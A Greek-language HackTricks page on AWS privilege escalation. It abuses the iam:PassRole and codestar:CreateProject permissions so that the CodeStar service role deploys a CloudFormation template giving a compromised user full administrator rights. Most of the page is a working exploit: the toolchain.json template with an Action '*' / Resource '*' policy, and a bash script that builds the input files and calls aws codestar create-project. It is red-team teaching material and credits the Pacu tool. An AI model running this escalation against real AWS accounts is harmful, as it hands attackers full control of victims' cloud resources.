iam:PassRole, codestar:CreateProject

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Με αυτές τις άδειες μπορείτε να καταχραστείτε έναν ρόλο IAM του codestar για να εκτελέσετε αυθαίρετες ενέργειες μέσω ενός προτύπου cloudformation.

Για να εκμεταλλευτείτε αυτό, πρέπει να δημιουργήσετε ένα κάδο S3 που είναι προσβάσιμος από τον προσβεβλημένο λογαριασμό. Μεταφορτώστε ένα αρχείο με το όνομα toolchain.json. Αυτό το αρχείο πρέπει να περιέχει το πρότυπο cloudformation exploit. Το παρακάτω μπορεί να χρησιμοποιηθεί για να ορίσει μια διαχειριζόμενη πολιτική σε έναν χρήστη υπό τον έλεγχό σας και να του δώσει δικαιώματα διαχειριστή:

toolchain.json
{
"Resources": {
"supercodestar": {
"Type": "AWS::IAM::ManagedPolicy",
"Properties": {
"ManagedPolicyName": "CodeStar_supercodestar",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
},
"Users": [
"<compromised username>"
]
}
}
}
}

Επίσης, ανεβάστε αυτό το άδειο αρχείο zip στο κάδο:

Θυμηθείτε ότι ο κάδος με τα δύο αρχεία πρέπει να είναι προσβάσιμος από τον λογαριασμό του θύματος.

Με τα δύο ανεβασμένα αρχεία, μπορείτε τώρα να προχωρήσετε στη εκμετάλλευση δημιουργώντας ένα έργο codestar:

PROJECT_NAME="supercodestar"

# Crecte the source JSON
## In this JSON the bucket and key (path) to the empry.zip file is used
SOURCE_CODE_PATH="/tmp/surce_code.json"
SOURCE_CODE="[
{
\"source\": {
\"s3\": {
\"bucketName\": \"privesc\",
\"bucketKey\": \"empty.zip\"
}
},
\"destination\": {
\"codeCommit\": {
\"name\": \"$PROJECT_NAME\"
}
}
}
]"
printf "$SOURCE_CODE" > $SOURCE_CODE_PATH

# Create the toolchain JSON
## In this JSON the bucket and key (path) to the toolchain.json file is used
TOOLCHAIN_PATH="/tmp/tool_chain.json"
TOOLCHAIN="{
\"source\": {
\"s3\": {
\"bucketName\": \"privesc\",
\"bucketKey\": \"toolchain.json\"
}
},
\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
}"
printf "$TOOLCHAIN" > $TOOLCHAIN_PATH

# Create the codestar project that will use the cloudformation epxloit to privesc
aws codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME \
--source-code file://$SOURCE_CODE_PATH \
--toolchain file://$TOOLCHAIN_PATH

Αυτή η εκμετάλλευση βασίζεται στην εκμετάλλευση των προνομίων Pacu: https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997 Σε αυτό μπορείτε να βρείτε μια παραλλαγή για τη δημιουργία μιας διαχειριζόμενης πολιτικής διαχειριστή για έναν ρόλο αντί για έναν χρήστη.

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated